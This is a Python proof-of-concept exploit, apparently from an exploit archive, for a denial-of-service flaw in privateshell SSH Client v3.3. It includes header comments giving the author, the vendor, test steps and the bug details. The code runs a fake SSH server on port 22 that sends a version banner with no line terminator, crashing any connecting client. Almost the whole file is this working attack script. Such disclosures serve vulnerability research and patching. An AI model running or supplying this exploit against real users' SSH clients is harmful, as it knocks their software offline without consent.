25 lines
No EOL
689 B
Python
Executable file
25 lines
No EOL
689 B
Python
Executable file
'''
|
|
# Exploit title: privateshell SSH Client v.3.3 denial of service vulnerability
|
|
# Date: 27-5-2015
|
|
# Vendor homepage: www.privateshell.com
|
|
# Software Link: http://www.privateshell.com/files/pshell.exe
|
|
# Version: 3.3
|
|
# Author: 3unnym00n
|
|
|
|
# Details:
|
|
# --------
|
|
# when doing the ssh version exchange, if the server send a banner missing \r\n, can lead the pshell crash
|
|
|
|
# Tested On: win7
|
|
# operating steps: run the py, then execute : "D:\programfile\Private Shell\ssh.exe" root@127.0.0.1
|
|
|
|
'''
|
|
|
|
|
|
|
|
import socket
|
|
soc = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
|
soc.bind(('127.0.0.1', 22))
|
|
soc.listen(1)
|
|
client, addr = soc.accept()
|
|
client.send('SSH-2.0-SUCK') ## no "\r\n" lead to crash |